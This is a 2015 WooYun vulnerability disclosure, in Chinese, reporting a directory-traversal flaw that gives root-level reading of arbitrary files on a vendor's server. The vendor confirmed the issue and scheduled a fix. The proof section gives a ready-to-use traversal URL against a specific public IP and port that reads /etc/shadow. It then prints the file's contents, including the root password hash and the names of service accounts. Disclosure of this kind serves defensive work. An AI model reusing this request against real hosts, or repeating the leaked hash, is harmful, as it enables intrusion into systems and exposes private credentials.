漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-08-30: 细节已通知厂商并且等待厂商处理中
2015-08-31: 厂商已经确认,细节仅向厂商公开
2015-09-10: 细节向核心白帽子及相关领域专家公开
2015-09-20: 细节向普通白帽子公开
2015-09-30: 细节向实习白帽子公开
2015-10-15: 细节向公众公开
简要描述:
可以读取远程主机上的远程主机上的任意文件,直接root权限 可下载shadow
详细说明:
漏洞证明:
http://121.207.243.133:8082/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/shadow
root:YnsI1kDIn0e9Q:16352:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
lp:*:15980:0:99999:7:::
sync:*:15980:0:99999:7:::
shutdown:*:15980:0:99999:7:::
halt:*:15980:0:99999:7:::
mail:*:15980:0:99999:7:::
uucp:*:15980:0:99999:7:::
operator:*:15980:0:99999:7:::
games:*:15980:0:99999:7:::
gopher:*:15980:0:99999:7:::
ftp:*:15980:0:99999:7:::
nobody:*:15980:0:99999:7:::
vcsa:!!:16340::::::
saslauth:!!:16340::::::
postfix:!!:16340::::::
sshd:!!:16340::::::
ntp:!!:16357::::::
zabbix:!!:16357:0:99999:7:::
nagios:!!:16357:0:99999:7:::
splunk:!!:16357:0:99999:7:::
mysql:!!:16364:0:99999:7:::
修复方案:
可能是接口调用的时候没做认证,
版权声明:转载请注明来源 咸鱼@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-08-31 09:45
厂商回复:
感谢咸鱼支持,已安排修复
最新状态:
暂无

